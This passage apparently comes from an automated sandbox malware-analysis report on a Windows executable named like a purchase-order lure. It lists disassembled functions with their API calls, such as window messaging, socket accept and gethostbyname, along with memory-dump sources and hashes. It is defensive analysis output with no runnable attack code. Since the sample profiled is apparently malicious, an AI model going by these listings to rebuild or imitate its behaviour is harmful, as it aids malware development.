                                                                  • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                  • GetForegroundWindow.USER32 ref: 004743EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                  • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                  • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                  • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                  Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                  • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                  • _wcslen.LIBCMT ref: 00449519
                                                                  • _wcslen.LIBCMT ref: 00449526
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend_wcslen$_wcspbrk
                                                                  • String ID:
                                                                  • API String ID: 2886238975-0
                                                                  • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                  • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                  • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                  • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                  Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __setmode$DebugOutputString_fprintf
                                                                  • String ID:
                                                                  • API String ID: 1792727568-0
                                                                  • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                  • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                  • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                  • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                  Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$AttributesLayered
                                                                  • String ID:
                                                                  • API String ID: 2169480361-0
                                                                  • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                  • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                  • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                  • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                  Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                  • String ID: cdecl
                                                                  • API String ID: 3850814276-3896280584
                                                                  • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                  • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                  Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                  • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                  • _memmove.LIBCMT ref: 0046D475
                                                                  • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 2502553879-0
                                                                  • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                  • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                  • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                  • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                  Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32 ref: 00448C69
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                  • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                  • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 312131281-0
                                                                  • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                  • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                  • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                  • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                  Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastacceptselect
                                                                  • String ID:
                                                                  • API String ID: 385091864-0
                                                                  • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                  • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                  • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                  • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                  Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                  Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateMessageObjectSendShowStock
                                                                  • String ID:
                                                                  • API String ID: 1358664141-0
                                                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                  Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 2880819207-0
                                                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                  Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                  • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                  • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                  • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                  • String ID:
                                                                  • API String ID: 357397906-0
                                                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                  Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 0043392E
                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                  • __wsplitpath.LIBCMT ref: 00433950
                                                                  • __wcsicoll.LIBCMT ref: 00433974
                                                                  • __wcsicoll.LIBCMT ref: 0043398A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                  • String ID:
                                                                  • API String ID: 1187119602-0
                                                                  • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                  • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                  • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                  • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                  Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1597257046-0
                                                                  • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                  • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                  • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                  • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                  Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                  • __malloc_crt.LIBCMT ref: 0041F5B6
